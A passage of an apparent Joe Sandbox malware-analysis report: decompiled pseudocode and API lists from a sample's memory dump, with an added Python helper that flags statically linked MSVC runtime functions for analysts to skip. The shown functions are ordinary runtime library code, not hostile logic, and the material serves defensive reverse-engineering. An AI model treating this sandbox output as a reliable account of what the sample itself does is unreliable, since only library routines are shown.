    									if(_v20 != _t116 || GetLastError() != 0x7a) {
    										L45:
    										_t71 = E00D72122();
    										_t116 = _t116 | 0xffffffff;
    										 *_t71 = 0x2a;
    										goto L51;
    									} else {
    										if(_t91 == 0) {
    											goto L56;
    										}
    										_t73 = _v24;
    										while(1) {
    											_t109 = _v44;
    											_t32 = _t109 + 4; // 0x680c6ac3
    											_t103 =  *_t32;
    											if(_t103 > 5) {
    												_t103 = 5;
    											}
    											_t35 = _t109 + 8; // 0xd86a68
    											_t74 = WideCharToMultiByte( *_t35, _t116, _t73, 1,  &_v16, _t103, _t116,  &_v20);
    											_t93 = _a12;
    											_t110 = _t74;
    											if(_t110 == 0 || _v20 != _t116 || _t110 < 0 || _t110 > 5) {
    												goto L55;
    											}
    											if(_t110 + _t114 > _t93) {
    												goto L56;
    											}
    											_t76 = _t116;
    											_v32 = _t76;
    											if(_t110 <= 0) {
    												L43:
    												_t73 = _v24 + 2;
    												_v24 = _t73;
    												if(_t114 < _t93) {
    													continue;
    												}
    												goto L56;
    											}
    											_t105 = _v28;
    											while(1) {
    												_t78 =  *((intOrPtr*)(_t117 + _t76 - 0xc));
    												 *((char*)(_t105 + _t114)) = _t78;
    												if(_t78 == 0) {
    													goto L56;
    												}
    												_t76 = _v32 + 1;
    												_t114 = _t114 + 1;
    												_v32 = _t76;
    												if(_t76 < _t110) {
    													continue;
    												}
    												goto L43;
    											}
    											goto L56;
    										}
    										goto L55;
    									}
    								}
    								if(_v20 != _t116) {
    									goto L45;
    								}
    								_t28 = _t114 - 1; // -1
    								_t116 = _t28;
    								goto L51;
    							}
    							if(_t91 == 0) {
    								L21:
    								_t20 = _t108 + 8; // 0xd86a68
    								_t116 = WideCharToMultiByte( *_t20, _t116, _t113, _t91, _t98, _t91, _t116,  &_v20);
    								if(_t116 == 0 || _v20 != 0) {
    									goto L45;
    								} else {
    									if(_v28[_t116 - 1] == 0) {
    										_t116 = _t116 - 1;
    									}
    									goto L51;
    								}
    							}
    							_t83 = _t113;
    							_v24 = _t91;
    							while( *_t83 != _t116) {
    								_t83 =  &(_t83[1]);
    								_t16 =  &_v24;
    								 *_t16 = _v24 - 1;
    								if( *_t16 != 0) {
    									continue;
    								}
    								break;
    							}
    							if(_v24 != _t116 &&  *_t83 == _t116) {
    								_t91 = (_t83 - _t113 >> 1) + 1;
    							}
    							goto L21;
    						}
    						if(_t91 == 0) {
    							goto L51;
    						}
    						while( *_t113 <= 0xff) {
    							_t98[_t116] =  *_t113;
    							_t85 =  *_t113;
    							_t113 =  &(_t113[1]);
    							if(_t85 == 0) {
    								goto L51;
    							}
    							_t116 = _t116 + 1;
    							if(_t116 < _t91) {
    								continue;
    							}
    							goto L51;
    						}
    						goto L45;
    					}
    					 *((intOrPtr*)(E00D72122())) = 0x16;
    					E00D70269();
    					goto L59;
    				} else {
    					L59:
    					return E00D6ABE4(_v8 ^ _t117);
    				}
    			}

    0x00d6e83f
    0x00d6e846
    0x00d6e849
    0x00d6e84d
    0x00d6e851
    0x00d6e853
    0x00d6e856
    0x00d6e85a
    0x00d6e85d
    0x00d6e862
    0x00d6e871
    0x00d6e891
    0x00d6e896
    0x00d6e89b
    0x00d6ea38
    0x00d6ea41
    0x00d6ea70
    0x00d6ea73
    0x00d6ea7b
    0x00d6ea87
    0x00d6ea87
    0x00d6ea8c
    0x00d6ea8f
    0x00000000
    0x00d6ea82
    0x00d6ea82
    0x00d6ea82
    0x00d6ea95
    0x00d6ea99
    0x00d6ea9e
    0x00d6ea9e
    0x00000000
    0x00d6eaa5
    0x00d6ea7b
    0x00d6ea43
    0x00d6ea49
    0x00d6ea61
    0x00d6ea61
    0x00000000
    0x00d6ea61
    0x00d6ea50
    0x00d6ea55
    0x00d6ea58
    0x00d6ea59
    0x00d6ea5f
    0x00000000
    0x00000000
    0x00000000
    0x00d6ea5f
    0x00000000
    0x00d6ea50
    0x00d6e8a1
    0x00d6e8aa
    0x00d6e8e4
    0x00d6e954
    0x00d6e95d
    0x00d6e961
    0x00d6e977
    0x00d6ea28
    0x00d6ea28
    0x00d6ea2d
    0x00d6ea30
    0x00000000
    0x00d6e98c
    0x00d6e98e
    0x00000000
    0x00000000
    0x00d6e994
    0x00d6e997
    0x00d6e997
    0x00d6e99a
    0x00d6e99a
    0x00d6e9a0
    0x00d6e9a4
    0x00d6e9a4
    0x00d6e9b3
    0x00d6e9b6
    0x00d6e9bc
    0x00d6e9bf
    0x00d6e9c3
    0x00000000
    0x00000000
    0x00d6e9e8
    0x00000000
    0x00000000
    0x00d6e9ee
    0x00d6e9f0
    0x00d6e9f5
    0x00d6ea15
    0x00d6ea18
    0x00d6ea1b
    0x00d6ea20
    0x00000000
    0x00000000
    0x00000000
    0x00d6ea26
    0x00d6e9f7
    0x00d6e9fa
    0x00d6e9fa
    0x00d6e9fe
    0x00d6ea03
    0x00000000
    0x00000000
    0x00d6ea0c
    0x00d6ea0d
    0x00d6ea0e
    0x00d6ea13
    0x00000000
    0x00000000
    0x00000000
    0x00d6ea13
    0x00000000
    0x00d6e9fa
    0x00000000
    0x00d6e997
    0x00d6e977
    0x00d6e966
    0x00000000
    0x00000000
    0x00d6e96c
    0x00d6e96c
    0x00000000
    0x00d6e96c
    0x00d6e8e8
    0x00d6e90e
    0x00d6e918
    0x00d6e921
    0x00d6e925
    0x00000000
    0x00d6e935
    0x00d6e93d
    0x00d6e943
    0x00d6e943
    0x00000000
    0x00d6e93d
    0x00d6e925
    0x00d6e8ea
    0x00d6e8ec
    0x00d6e8ef
    0x00d6e8f4
    0x00d6e8f7
    0x00d6e8f7
    0x00d6e8fb
    0x00000000
    0x00000000
    0x00000000
    0x00d6e8fb
    0x00d6e900
    0x00d6e90d
    0x00d6e90d
    0x00000000
    0x00d6e900
    0x00d6e8ae
    0x00000000
    0x00000000
    0x00d6e8b9
    0x00d6e8c4
    0x00d6e8c7
    0x00d6e8ca
    0x00d6e8d0
    0x00000000
    0x00000000
    0x00d6e8d6
    0x00d6e8d9
    0x00000000
    0x00000000
    0x00000000
    0x00d6e8db
    0x00000000
    0x00d6e8b9
    0x00d6e878
    0x00d6e87e
    0x00000000
    0x00d6e868
    0x00d6eaa7
    0x00d6eab7
    0x00d6eab7

    APIs
    • WideCharToMultiByte.KERNEL32(00D86A68,00000000,00000000,00D6A69C,00000000,00D6A69C,00000000,00D6A69C,?,00000000,00000000,?,?,00D6EACD,?,00000000), ref: 00D6E91B
    • WideCharToMultiByte.KERNEL32(00D86A68,00000000,00000000,000000FF,00000000,00D6A69C,00000000,00D6A69C,?,00000000,00000000,?,?,00D6EACD,?,00000000), ref: 00D6E957
    • GetLastError.KERNEL32(?,?,00D6EACD,?,00000000,00D6A69C,00000000,?,00D6A69C,00000000,123,00000003), ref: 00D6E97D
    • WideCharToMultiByte.KERNEL32(00D86A68,00000000,?,00000001,00000000,680C6AC3,00000000,00D6A69C,?,?,00D6EACD,?,00000000,00D6A69C,00000000), ref: 00D6E9B6
    • WideCharToMultiByte.KERNEL32(00D86A68,00000000,00000000,000000FF,00000000,00000000,00000000,00D6A69C,?,00000000,00000000,?,?,00D6EACD,?,00000000), ref: 00D6EA73
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 81%
    			E00D7721A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
    				signed int _v8;
    				int _v12;
    				char _v16;
    				intOrPtr _v24;
    				char _v28;
    				void* _v40;
    				signed int _t34;
    				signed int _t40;
    				int _t46;
    				int _t53;
    				void* _t55;
    				int _t57;
    				signed int _t63;
    				int _t67;
    				short* _t69;
    				signed int _t70;
    				short* _t71;
    
    				_t34 =  *0xd88004; // 0x276b9783
    				_v8 = _t34 ^ _t70;
    				E00D6E412(__ebx,  &_v28, __edx, _a4);
    				_t57 = _a24;
    				if(_t57 == 0) {
    					_t53 =  *(_v24 + 8);
    					_t57 = _t53;
    					_a24 = _t53;
    				}
    				_t67 = 0;
    				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
    				_v12 = _t40;
    				if(_t40 == 0) {
    					L15:
    					if(_v16 != 0) {
    						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
    					}
    					return E00D6ABE4(_v8 ^ _t70);
    				}
    				_t55 = _t40 + _t40;
    				asm("sbb eax, eax");
    				if((_t55 + 0x00000008 & _t40) == 0) {
    					_t69 = 0;
    					L11:
    					if(_t69 != 0) {
    						E00D6D520(_t67, _t69, _t67, _t55);
    						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
    						if(_t46 != 0) {
    							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
    						}
    					}
    					L14:
    					E00D77337(_t69);
    					goto L15;
    				}
    				asm("sbb eax, eax");
    				_t48 = _t40 & _t55 + 0x00000008;
    				_t63 = _t55 + 8;
    				if((_t40 & _t55 + 0x00000008) > 0x400) {
    					asm("sbb eax, eax");
    					_t69 = E00D717FF(_t63, _t48 & _t63);
    					if(_t69 == 0) {
    						goto L14;
    					}
    					 *_t69 = 0xdddd;
    					L9:
    					_t69 =  &(_t69[4]);
    					goto L11;
    				}
    				asm("sbb eax, eax");
    				E00D7D520();
    				_t69 = _t71;
    				if(_t69 == 0) {
    					goto L14;
    				}
    				 *_t69 = 0xcccc;
    				goto L9;
    			}

    0x00d77222
    0x00d77229
    0x00d77235
    0x00d7723a
    0x00d7723f
    0x00d77244
    0x00d77247
    0x00d77249
    0x00d77249
    0x00d7724e
    0x00d77267
    0x00d7726d
    0x00d77272
    0x00d77311
    0x00d77315
    0x00d7731a
    0x00d7731a
    0x00d77336
    0x00d77336
    0x00d77278
    0x00d77280
    0x00d77284
    0x00d772d0
    0x00d772d2
    0x00d772d4
    0x00d772d9
    0x00d772f0
    0x00d772f8
    0x00d77308
    0x00d77308
    0x00d772f8
    0x00d7730a
    0x00d7730b
    0x00000000
    0x00d77310
    0x00d7728b
    0x00d7728d
    0x00d7728f
    0x00d77297
    0x00d772b4
    0x00d772be
    0x00d772c3
    0x00000000
    0x00000000
    0x00d772c5
    0x00d772cb
    0x00d772cb
    0x00000000
    0x00d772cb
    0x00d7729b
    0x00d7729f
    0x00d772a4
    0x00d772a8
    0x00000000
    0x00000000
    0x00d772aa
    0x00000000

    APIs
    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00D73AE8,?,00000000,?,00000001,?,?,00000001,00D73AE8,?), ref: 00D77267
    • __alloca_probe_16.NTDLLP ref: 00D7729F
      • Part of subcall function 00D717FF: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D61CE9,?,?,?,?,00D61B06,?,00000001), ref: 00D71831
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D772F0
    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00D719A1,?), ref: 00D77302
    • __freea.LIBCMT ref: 00D7730B
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
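Triage note. The functions dumped on this page are not the sample's own logic: E00D7721A resolves `__alloca_probe_16.NTDLLP` and `__freea.LIBCMT`, stores the `_malloca` stack/heap markers 0xcccc and 0xdddd around a 0x400-byte threshold, and wraps `GetStringTypeW`; E00D6E837 sets errno to 0x16 (EINVAL) and 0x2a (EILSEQ) through the `_errno()` pointer around `WideCharToMultiByte`; E00D6C90E resolves `_GetRangeOfTrysToCheck.LIBVCRUNTIME` and compares against the CLR exception codes 0xe0434f4d and 0xe0434352. These are statically linked MSVC CRT and vcruntime routines, and the /GS cookie read from 0xd88004 checked via E00D6ABE4 appears in the sample's own functions as well, so it is not a useful discriminator on its own. The helper below is an added example, not part of the Joe Sandbox report or the analysed binary: the fingerprint rules, their weights and the threshold are ours, three of its inputs are short excerpts copied from this report's C-Code and APIs blocks, and the fourth is a constructed stand-in for sample-owned code.

```python
"""Added triage helper for decompiled dumps like the one on this page. Not part of
the Joe Sandbox report or of the analysed sample: the scoring rules are ours, and
the inputs at the bottom are excerpts copied from this report plus one constructed
non-CRT snippet. Goal: flag functions that look like statically linked MSVC CRT /
vcruntime code so review time goes to the sample's own logic instead."""
import re

# (rule name, pattern, weight). Each pattern runs over one function's text:
# the pseudocode followed by its 'APIs' list as printed in the report.
RULES = [
    # /GS prologue and epilogue (cookie XOR frame pointer, checked on return).
    # Weak on its own: the sample's own /GS-compiled functions carry it too.
    ("security_cookie",
     re.compile(r"_v8 = _t\d+ \^ _t\d+;.*?return E[0-9A-F]{8}\(_v8 \^ _t\d+\)", re.S), 1),
    # _malloca(): 0xcccc stack marker, 0xdddd heap marker, switch at 0x400 bytes.
    ("malloca_markers",
     re.compile(r"= 0xcccc;.*= 0xdddd;|= 0xdddd;.*= 0xcccc;", re.S), 3),
    # errno written through the pointer a helper returns: 0x16 EINVAL, 0x2a EILSEQ.
    ("errno_store",
     re.compile(r"\*\s*_t\d+ = 0x(16|2a);|\*\(\(intOrPtr\*\)\(E[0-9A-F]{8}\(\)\)\) = 0x(16|2a);"), 3),
    # Symbols the report itself resolves to CRT libraries.
    ("crt_library_tag",
     re.compile(r"\.(LIBCMT|LIBVCRUNTIME|NTDLLP)\b"), 3),
    # Exception codes handled by the vcruntime C++ frame handler: 'msc', 'MOC', 'CCR'.
    ("eh_exception_codes",
     re.compile(r"0xe06d7363|0xe0434f4d|0xe0434352", re.I), 3),
]
THRESHOLD = 4  # our cut-off: one strong fingerprint, or the cookie plus one more


def score_function(text):
    """Return (score, [rule names that matched]) for one function block."""
    hits = [name for name, rx, _ in RULES if rx.search(text)]
    score = sum(w for name, _, w in RULES if name in hits)
    return score, hits


def classify(text):
    """Label a function block 'crt-like' or 'review', with its score and hits."""
    score, hits = score_function(text)
    return ("crt-like" if score >= THRESHOLD else "review"), score, hits


def triage(blocks):
    """Map {function name: block text} to {function name: label}."""
    return {name: classify(text)[0] for name, text in blocks.items()}


# Excerpts copied from the report above (whitespace as printed there).
E00D6E837 = """
_t59 =  *0xd88004; // 0x276b9783
_v8 = _t59 ^ _t117;
 *_t65 = 0x2a;
 *((intOrPtr*)(E00D72122())) = 0x16;
return E00D6ABE4(_v8 ^ _t117);
"""
E00D7721A = """
_v8 = _t34 ^ _t70;
if((_t40 & _t55 + 0x00000008) > 0x400) {
 *_t69 = 0xdddd;
 *_t69 = 0xcccc;
return E00D6ABE4(_v8 ^ _t70);
• __alloca_probe_16.NTDLLP ref: 00D7729F
• __freea.LIBCMT ref: 00D7730B
"""
E00D6C90E = """
__imp__EncodePointer(0);
if( *((intOrPtr*)(E00D6DA88(_t98, _t105, __edx, _t119, _t130, _t144) + 8)) == _t130 ||  *_t119 == 0xe0434f4d ||  *_t119 == 0xe0434352) {
• _GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 00D6C991
"""
# Constructed stand-in for sample-owned code (not from the report): plain file I/O.
SAMPLE_OWN = """
_t5 = CreateFileW(_a4, 0xc0000000, 0, 0, 2, 0x80, 0);
WriteFile(_t5, _v12, _t8,  &_v16, 0);
CloseHandle(_t5);
"""

if __name__ == "__main__":
    for name, text in {"E00D6E837": E00D6E837, "E00D7721A": E00D7721A,
                       "E00D6C90E": E00D6C90E, "constructed": SAMPLE_OWN}.items():
        print(name, *classify(text))
```

Run it over each function block of a report (pseudocode plus its APIs list) and skip the ones labelled crt-like; anything labelled review still needs eyes. The weights are deliberately conservative: a single /GS cookie never tips a function, while a CRT library tag, `_malloca` markers or an errno store does, because none of those appear in ordinary application code.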
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 61%
    			E00D6C90E(void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
    				intOrPtr _v0;
    				char _v8;
    				char _v12;
    				intOrPtr* _v16;
    				intOrPtr* _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr* _v32;
    				intOrPtr* _v60;
    				void* __ebx;
    				void* __ecx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				intOrPtr _t70;
    				void* _t71;
    				intOrPtr* _t74;
    				intOrPtr* _t78;
    				intOrPtr* _t82;
    				intOrPtr* _t83;
    				intOrPtr _t84;
    				intOrPtr _t86;
    				intOrPtr* _t87;
    				intOrPtr* _t89;
    				signed int _t93;
    				void* _t97;
    				intOrPtr _t98;
    				intOrPtr* _t100;
    				char _t101;
    				void* _t105;
    				intOrPtr _t111;
    				char _t114;
    				intOrPtr _t116;
    				intOrPtr* _t119;
    				intOrPtr* _t121;
    				intOrPtr* _t123;
    				intOrPtr _t129;
    				void* _t130;
    				intOrPtr* _t131;
    				intOrPtr* _t132;
    				signed int* _t136;
    				void* _t138;
    				void* _t140;
    				void* _t141;
    				void* _t142;
    
    				_t113 = __edx;
    				_push(_t105);
    				_push(_t105);
    				_t119 = _a4;
    				_t143 =  *_t119 - 0x80000003;
    				if( *_t119 == 0x80000003) {
    					L18:
    					return _t70;
    				} else {
    					_t71 = E00D6DA88(_t97, _t105, __edx, _t119, _t130, _t143, _t130, _t97);
    					_t98 = _a20;
    					_t144 =  *((intOrPtr*)(_t71 + 8));
    					if( *((intOrPtr*)(_t71 + 8)) == 0) {
    						L6:
    						if( *((intOrPtr*)(_t98 + 0xc)) == 0) {
    							E00D6E7FB(_t98, _t105, _t113, _t119);
    							asm("int3");
    							_t138 = _t140;
    							_t141 = _t140 - 0x18;
    							_push(_t98);
    							_push(_t130);
    							_t131 = _v16;
    							_push(_t119);
    							__eflags = _t131;
    							if(_t131 == 0) {
    								E00D6E7FB(_t98, _t105, _t113, _t119);
    								asm("int3");
    								_push(_t138);
    								_push(_t98);
    								_push(_t131);
    								_push(_t119);
    								_t121 = _v60;
    								_t132 = 0;
    								__eflags =  *_t121;
    								if( *_t121 <= 0) {
    									L37:
    									_t74 = 0;
    									__eflags = 0;
    								} else {
    									_t100 = 0;
    									while(1) {
    										_t78 = E00D6D4DE( *((intOrPtr*)(_t100 +  *((intOrPtr*)(_t121 + 4)) + 4)) + 4, 0xd90bac);
    										__eflags = _t78;
    										if(_t78 == 0) {
    											break;
    										}
    										_t132 = _t132 + 1;
    										_t100 = _t100 + 0x10;
    										__eflags = _t132 -  *_t121;
    										if(_t132 <  *_t121) {
    											continue;
    										} else {
    											goto L37;
    										}
    										goto L38;
    									}
    									_t74 = 1;
    								}
    								L38:
    								return _t74;
    							} else {
    								_t123 =  *_t131;
    								_t101 = 0;
    								__eflags = _t123;
    								if(_t123 > 0) {
    									_t114 = 0;
    									_v12 = 0;
    									_t82 =  *((intOrPtr*)( *((intOrPtr*)(_v0 + 0x1c)) + 0xc));
    									_t83 = _t82 + 4;
    									__eflags = _t83;
    									_v24 =  *_t82;
    									_v32 = _t83;
    									do {
    										_t109 = _t83;
    										_t84 = _v24;
    										_v20 = _t83;
    										_v16 = _t84;
    										__eflags = _t84;
    										if(_t84 > 0) {
    											_t86 =  *((intOrPtr*)(_t131 + 4)) + _t114;
    											__eflags = _t86;
    											_v28 = _t86;
    											while(1) {
    												_t87 = E00D6CEF6(_t86,  *_t109,  *((intOrPtr*)(_v0 + 0x1c)));
    												_t141 = _t141 + 0xc;
    												__eflags = _t87;
    												if(_t87 != 0) {
    													break;
    												}
    												_t89 = _v16 - 1;
    												_t109 = _v20 + 4;
    												_v16 = _t89;
    												__eflags = _t89;
    												_v20 = _v20 + 4;
    												_t86 = _v28;
    												if(_t89 > 0) {
    													continue;
    												} else {
    												}
    												L29:
    												_t114 = _v12;
    												goto L30;
    											}
    											_t101 = 1;
    											goto L29;
    										}
    										L30:
    										_t83 = _v32;
    										_t114 = _t114 + 0x10;
    										_v12 = _t114;
    										_t123 = _t123 - 1;
    										__eflags = _t123;
    									} while (_t123 != 0);
    								}
    								return _t101;
    							}
    						} else {
    							_t70 = E00D6D7B7(_t105, _t98, _a28, _a24,  &_v12,  &_v8);
    							_t111 = _v12;
    							_t142 = _t140 + 0x14;
    							_t116 = _v8;
    							if(_t111 < _t116) {
    								_t17 = _t70 + 0xc; // 0xc
    								_t136 = _t17;
    								_t70 = _a24;
    								do {
    									if(_t70 >=  *((intOrPtr*)(_t136 - 0xc)) && _t70 <=  *((intOrPtr*)(_t136 - 8))) {
    										_t93 =  *_t136 << 4;
    										if( *((intOrPtr*)(_t136[1] + _t93 - 0xc)) == 0) {
    											L13:
    											_t94 = _t93 + _t136[1] + 0xfffffff0;
    											_t129 = _a4;
    											if(( *(_t93 + _t136[1] + 0xfffffff0) & 0x00000040) == 0) {
    												_push(1);
    												_t35 = _t136 - 0xc; // 0x0
    												E00D6C4E1(_t98, _t116, _t129, _a8, _a12, _a16, _t98, _t94, 0, _t35, _a28, _a32);
    												_t116 = _v8;
    												_t142 = _t142 + 0x2c;
    												_t111 = _v12;
    											}
    										} else {
    											_t116 = _v8;
    											_t98 = _a20;
    											if( *((char*)( *((intOrPtr*)(_t136[1] + _t93 - 0xc)) + 8)) == 0) {
    												goto L13;
    											}
    										}
    										_t70 = _a24;
    									}
    									_t111 = _t111 + 1;
    									_t136 =  &(_t136[5]);
    									_v12 = _t111;
    								} while (_t111 < _t116);
    							}
    							goto L17;
    						}
    					} else {
    						__imp__EncodePointer(0);
    						_t130 = _t71;
    						if( *((intOrPtr*)(E00D6DA88(_t98, _t105, __edx, _t119, _t130, _t144) + 8)) == _t130 ||  *_t119 == 0xe0434f4d ||  *_t119 == 0xe0434352) {
    							goto L6;
    						} else {
    							_t70 = E00D6D6DA(_t119, _a8, _a12, _a16, _t98, _a28, _a32);
    							_t140 = _t140 + 0x1c;
    							if(_t70 != 0) {
    								L17:
    								goto L18;
    							} else {
    								goto L6;
    							}
    						}
    					}
    				}
    			}

    0x00d6c90e
    0x00d6c911
    0x00d6c912
    0x00d6c914
    0x00d6c917
    0x00d6c91d
    0x00d6ca1e
    0x00d6ca22
    0x00d6c923
    0x00d6c925
    0x00d6c92a
    0x00d6c92d
    0x00d6c931
    0x00d6c978
    0x00d6c97c
    0x00d6ca23
    0x00d6ca28
    0x00d6ca2a
    0x00d6ca2c
    0x00d6ca2f
    0x00d6ca30
    0x00d6ca31
    0x00d6ca34
    0x00d6ca35
    0x00d6ca37
    0x00d6cabf
    0x00d6cac4
    0x00d6cac5
    0x00d6cac8
    0x00d6cac9
    0x00d6caca
    0x00d6cacb
    0x00d6cace
    0x00d6cad0
    0x00d6cad2
    0x00d6caf9
    0x00d6caf9
    0x00d6caf9
    0x00d6cad4
    0x00d6cad4
    0x00d6cad6
    0x00d6cae6
    0x00d6caed
    0x00d6caef
    0x00000000
    0x00000000
    0x00d6caf1
    0x00d6caf2
    0x00d6caf5
    0x00d6caf7
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00d6caf7
    0x00d6cb00
    0x00d6cb00
    0x00d6cafb
    0x00d6caff
    0x00d6ca3d
    0x00d6ca3d
    0x00d6ca3f
    0x00d6ca41
    0x00d6ca43
    0x00d6ca48
    0x00d6ca4a
    0x00d6ca50
    0x00d6ca55
    0x00d6ca55
    0x00d6ca58
    0x00d6ca5b
    0x00d6ca5e
    0x00d6ca5e
    0x00d6ca60
    0x00d6ca63
    0x00d6ca66
    0x00d6ca69
    0x00d6ca6b
    0x00d6ca70
    0x00d6ca70
    0x00d6ca72
    0x00d6ca75
    0x00d6ca7e
    0x00d6ca83
    0x00d6ca86
    0x00d6ca88
    0x00000000
    0x00000000
    0x00d6ca90
    0x00d6ca91
    0x00d6ca94
    0x00d6ca97
    0x00d6ca99
    0x00d6ca9c
    0x00d6ca9f
    0x00000000
    0x00000000
    0x00d6caa1
    0x00d6caa5
    0x00d6caa5
    0x00000000
    0x00d6caa5
    0x00d6caa3
    0x00000000
    0x00d6caa3
    0x00d6caa8
    0x00d6caa8
    0x00d6caab
    0x00d6caae
    0x00d6cab1
    0x00d6cab1
    0x00d6cab1
    0x00d6ca5e
    0x00d6cabe
    0x00d6cabe
    0x00d6c982
    0x00d6c991
    0x00d6c996
    0x00d6c999
    0x00d6c99c
    0x00d6c9a1
    0x00d6c9a3
    0x00d6c9a3
    0x00d6c9a6
    0x00d6c9a9
    0x00d6c9ac
    0x00d6c9b8
    0x00d6c9c1
    0x00d6c9d6
    0x00d6c9dc
    0x00d6c9de
    0x00d6c9e4
    0x00d6c9e6
    0x00d6c9eb
    0x00d6ca00
    0x00d6ca05
    0x00d6ca08
    0x00d6ca0b
    0x00d6ca0b
    0x00d6c9c3
    0x00d6c9ca
    0x00d6c9d1
    0x00d6c9d4
    0x00000000
    0x00000000
    0x00d6c9d4
    0x00d6ca0e
    0x00d6ca0e
    0x00d6ca11
    0x00d6ca12
    0x00d6ca15
    0x00d6ca18
    0x00d6c9a9
    0x00000000
    0x00d6c9a1
    0x00d6c933
    0x00d6c935
    0x00d6c93b
    0x00d6c945
    0x00000000
    0x00d6c957
    0x00d6c968
    0x00d6c96d
    0x00d6c972
    0x00d6ca1c
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00d6c972
    0x00d6c945
    0x00d6c931

    APIs
      • Part of subcall function 00D6DA88: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D71869
    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,?,?,00D869CC), ref: 00D6C935
    • _GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 00D6C991
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 75%
    			E00D740A9(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				unsigned int _v20;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				char _v40;
    				intOrPtr _v48;
    				char _v52;
    				void* __ebx;
    				void* __edi;
    				void* _t86;
    				signed int _t92;
    				signed int _t93;
    				signed int _t94;
    				signed int _t100;
    				void* _t101;
    				void* _t102;
    				void* _t104;
    				void* _t107;
    				void* _t109;
    				void* _t111;
    				void* _t115;
    				char* _t116;
    				void* _t119;
    				signed int _t121;
    				signed int _t128;
    				signed int* _t129;
    				signed int _t136;
    				signed int _t137;
    				char _t138;
    				signed int _t139;
    				signed int _t142;
    				signed int _t146;
    				signed int _t151;
    				char _t156;
    				char _t157;
    				void* _t161;
    				unsigned int _t162;
    				signed int _t164;
    				signed int _t166;
    				signed int _t170;
    				void* _t171;
    				signed int* _t172;
    				signed int _t174;
    				signed int _t181;
    				signed int _t182;
    				signed int _t183;
    				signed int _t184;
    				signed int _t185;
    				signed int _t186;
    				signed int _t187;
    
    				_t171 = __edx;
    				_t181 = _a24;
    				if(_t181 < 0) {
    					_t181 = 0;
    				}
    				_t184 = _a8;
    				 *_t184 = 0;
    				E00D6E412(0,  &_v52, _t171, _a36);
    				_t5 = _t181 + 0xb; // 0xb
    				if(_a12 > _t5) {
    					_t172 = _a4;
    					_t142 = _t172[1];
    					_v36 =  *_t172;
    					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
    					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
    						L11:
    						__eflags = _t142 & 0x80000000;
    						if((_t142 & 0x80000000) != 0) {
    							 *_t184 = 0x2d;
    							_t184 = _t184 + 1;
    							__eflags = _t184;
    						}
    						__eflags = _a28;
    						_v16 = 0x3ff;
    						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
    						__eflags = _t172[1] & 0x7ff00000;
    						_v32 = _t136;
    						_t86 = 0x30;
    						if((_t172[1] & 0x7ff00000) != 0) {
    							 *_t184 = 0x31;
    							_t185 = _t184 + 1;
